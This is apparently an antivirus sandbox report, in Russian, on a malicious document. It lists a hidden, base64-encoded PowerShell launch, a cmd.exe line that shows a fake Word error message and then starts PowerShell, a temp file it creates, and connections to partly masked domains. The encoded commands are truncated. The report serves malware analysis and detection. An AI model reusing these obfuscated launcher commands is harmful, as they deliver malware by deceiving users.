Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ENCOD IABTAEUAdAAgACAARABnAEoAIAAgACgAIABbAFQAWQBQAEUAXQAoACIAewAzAH0AewAyAH0AewA0AH0AewAwAH0AewAxAH0AIgAgAC0AZgAnAFQAJwAsACcAbwBSAHkAJwAsACcAVABFAG0ALgBpAG8ALgBkAGkA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1396
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1004506.cvr
Сетевая активность
Подключается к
- 'ke####lectric.ca':443
- 'on######heorie.driveddy.com':443
TCP
Другие
- 'ke####lectric.ca':443
- 'on######heorie.driveddy.com':443
UDP
- DNS ASK ke####lectric.ca
- DNS ASK nc##aa.org
- DNS ASK gi####rd2naira.com
- DNS ASK pr####rmakassar.com
- DNS ASK on######heorie.driveddy.com
- DNS ASK sb#.###ajihandheld.in
- DNS ASK re####outcare.site
- DNS ASK ct###font.com
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IABTAEUAdAAgACAARABnAEoAIAAgACgAIABbAFQAWQBQAEUAXQAoACIAewAzAH...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.
